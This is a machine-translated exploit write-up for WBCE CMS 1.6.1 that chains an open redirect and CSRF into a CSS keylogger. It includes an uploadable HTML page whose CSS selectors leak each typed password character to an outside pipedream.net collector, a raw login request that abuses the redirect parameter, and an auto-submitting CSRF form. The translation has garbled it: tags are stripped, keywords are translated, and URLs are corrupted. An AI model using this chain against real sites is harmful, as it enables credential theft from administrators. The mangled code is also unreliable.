WBCE CMS 1.6.1-打开重定向CSRF

HackApt-37 Team · 04 9, 2025

利用标题: WBCE CMS 1.6.1-开放重定向CSRF
版本: 1.6.1
BUGS:打开重定向+ CSRF=CSS键盘记录
Technology: php
供应商URL: https://wbce-cms.org/
软件link: https://github.com/wbce/wbce_cms/releases/tag/1.6.1
发现日期: 03-07-2023
作者:MirabbasAğalarov
在: Linux上测试
2。技术细节POC
====================================================
1。登录帐户
2。转到媒体（http://localhost/wbce_cms-1.6.1/wbce/admin/media/index.php＃elf_l1_lw）
3。然后您上传HTML文件。（HTML文件内容如下）
'''
html
头
标题
登录
/标题
风格
输入[type='密码'] [value*='q'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/q'）;};}
输入[type='密码'] [value*='w'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/w'）;};}
输入[type='密码'] [value*='e'] {
background-image: URL（'3https://enflownwx6she.x.pipedream.net/e'）;};}
输入[type='密码'] [value*='r'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/r'）;};}
输入[type='密码'] [value*='t'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/t'）;};}
输入[type='密码'] [value*='y'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/y'）;};}
输入[type='密码'] [value*='u'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/u'）;};}
输入[type='密码'] [value*='i'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/i'）;};}
输入[type='密码'] [value*='o'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/o'）;};}
输入[type='密码'] [value*='p'] {
background-image: url（'3https://enflownwx6she.x.pipedream.net/p'）;};}
输入[type='密码'] [value*='a'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/a'）;};}
输入[type='密码'] [value*='s'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/s'）;};}
输入[type='密码'] [value*='d'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/d'）;};}
输入[type='密码'] [value*='f'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/f'）;};}
输入[type='密码'] [value*='g'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/g'）;};}
输入[type='密码'] [value*='h'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/h'）;};}
输入[type='密码'] [value*='j'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/j'）;};}
输入[type='密码'] [value*='k'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/k'）;};}
输入[type='密码'] [value*='l'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/l'）;};}
输入[type='密码'] [value*='z'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/z'）;};}
输入[type='密码'] [value*='x'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/x'）;};}
输入[type='密码'] [value*='c'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/c'）;};}
输入[type='密码'] [value*='v'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/v'）;};}
输入[type='密码'] [value*='b'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/b'）;};}
输入[type='密码'] [value*='n'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/n'）;};}
输入[type='密码'] [value*='m'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/m'）;};}
输入[type='密码'] [value*='q'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/q'）;};}
输入[type='密码'] [value*='w'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/w'）;};}
输入[type='密码'] [value*='e'] {
background-image: URL（'https://enflownwx6she.x.pipedream.net/e'）;};}
输入[type='密码'] [value*='r'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/r'）;};}
输入[type='密码'] [value*='t'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/t'）;};}
输入[type='密码'] [value*='y'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/y'）;};}
输入[type='密码'] [value*='u'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/u'）;};}
输入[type='密码'] [value*='i'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/i'）;};}
输入[type='密码'] [value*='o'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/o'）;};}
输入[type='密码'] [value*='p'] {
background-image: url（'3https://enflownwx6she.x.pipedream.net/p'）;};}
输入[type='密码'] [value*='a'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/a'）;};}
输入[type='密码'] [value*='s'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/s'）;};}
输入[type='密码'] [value*='d'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/d'）;};}
输入[type='密码'] [value*='f'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/f'）;};}
输入[type='密码'] [value*='g'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/g'）;};}
输入[type='密码'] [value*='h'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/h'）;};}
输入[type='密码'] [value*='j'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/j'）;};}
输入[type='密码'] [value*='k'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/k'）;};}
输入[type='密码'] [value*='l'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/l'）;};}
输入[type='密码'] [value*='z'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/z'）;};}
输入[type='密码'] [value*='x'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/x'）;};}
输入[type='密码'] [value*='c'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/c'）;};}
输入[type='密码'] [value*='v'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/v'）;};}
输入[type='密码'] [value*='b'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/b'）;};}
输入[type='密码'] [value*='n'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/n'）;};}
输入[type='密码'] [value*='m'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/m'）;};}
输入[type='密码'] [value*='1'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/1'）;};}
输入[type='密码'] [value*='2'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/2'）;};}
输入[type='密码'] [value*='3'] {
background-image: url（'3https://enflownwx6she.x.pipedream.net/3'）;};}
输入[type='密码'] [value*='4'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/4'）;};}
输入[type='密码'] [value*='5'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/5'）;};}
输入[type='密码'] [value*='6'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/6'）;};}
输入[type='密码'] [value*='7'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/7'）;};}
输入[type='密码'] [value*='8'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/8'）;};}
输入[type='密码'] [value*='9'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/9）;};}
输入[type='密码'] [value*='0'] {
background-image: url（'https://enflownwx6she.x.pipedream.net/0'）;};}
输入[type='密码'] [value*=' - '] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/--'）;};}
输入[type='密码'] [value*='。'] {
Background-Image: URL（'3https://enflownwx6she.x.pipedream.net/。'）;};}
输入[type='密码'] [value*='_'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/`'）;};}
输入[type='密码'] [value*='@'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/@'）;};}
输入[type='password'] [value*='？'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/?'）;};}
输入[type='密码'] [value*=''] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/>'）;};}
输入[type='密码'] [value*=''] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/<'）;};}
输入[type='密码'] [value*='='] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/='）;};}
输入[type='密码'] [value*=':'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/:'）;};}
输入[type='密码'] [value*=';'] {
Background-Image: URL（'https://enflownwx6she.x.pipedream.net/;'）;};}
/风格
/头
身体
标签输入用户名和密码/标签
Brbr
密码:输入类型='密码' /
脚本
document.queryselector（'input'）。addeventListener（'keyup'，（evt）={
evt.target.setAttribute（'value'，evt.target.value）;
}））
/脚本
/身体
/html
'''
4.然后转到html文件的URL（http://localhost/wbce_cms-1.6.1/wbce/media/css-keyloger.html）并复制URL。
5.然后您的注销帐户，然后再次登录页面（http://localhost/wbce_cms-1.6.1/wbce/admin/login/login/index.php）
post/wbce_cms-1.6.1/wbce/admin/login/index.php http/1.1
HOST: LOCALHOST
内容长度: 160
cache-control: max-age=0
SEC-CH-UA:
sec-ch-ua-mobile:0
sec-ch-ua-platform:''
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户- 代理: Mozilla/5.0（Windows NT 10.0; Win64; X64）AppleWebkit/537.36（Khtml，像Gecko一样）Chrome/114.0.5735.134 Safari/537.36
ACCEPT: TEXT/HTML，应用程序/XHTML+XML，Application/XML; Q=0.9，Image/avif，Image/WebP，Image/apng，/; q=0.8，application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/wbce_cms-1.6.1/wbce/admin/login/index.php
Accept-incoding: Gzip，放气
Accept-Language: en-us，en; q=0.9
cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uug
连接:关闭
url=username_fieldname=userName_3584b221ec89password_fieldname=password_3584b221ec89username_3584b221ec89=testpassword_3584b2221ec89=hello123％21submit=login
6.如果在您的url参数中写入（https://Attacker.com），请在上述请求中重定向到Attacker.com。
7.我们写入HTML文件URL
url=http://localhost/wbce_cms-1.6.1/wbce/媒体/css-keyloger.html
8.并使用csrf.poc.generator创建CSRF-POC
html
标题
该CSRF由Miri发现
/标题
身体
H1
CSRF POC
/H1
表单操作='http://localhost/wbce_cms-1.6.1/wbc...st'enctype='application/x-www-form-urlenceded''
输入type='隐藏'名称='url'值='http://localhost/wbce_cms-1.6.1/wbce/media/css-keyloger.html'/
/形式
scriptDocument.Forms [0] .submit（）;/script
/身体
/html
9.如果受害者单击，将HT重定向到HTML文件，此页面将所有受害者的键盘活动发送到我的服务器。
POC视频:

H	WBCE CMS 1.6.1-多个存储的跨站点脚本（XSS） HackApt-37 Team 04 9, 2025 POC/?Day
H	WBCE CMS 1.6.3-身份验证的远程代码执行（RCE） HackApt-37 Team 04 9, 2025 POC/?Day
H	WBCE CMS V1.6.2-远程代码执行（RCE） HackApt-37 Team 04 9, 2025 POC/?Day
H	WBCE CMS版本1.6.1-远程命令执行（身份验证） HackApt-37 Team 04 9, 2025 POC/?Day
H	WBCE 1.6.0-未经验证的SQL注入 HackApt-37 Team 04 9, 2025 POC/?Day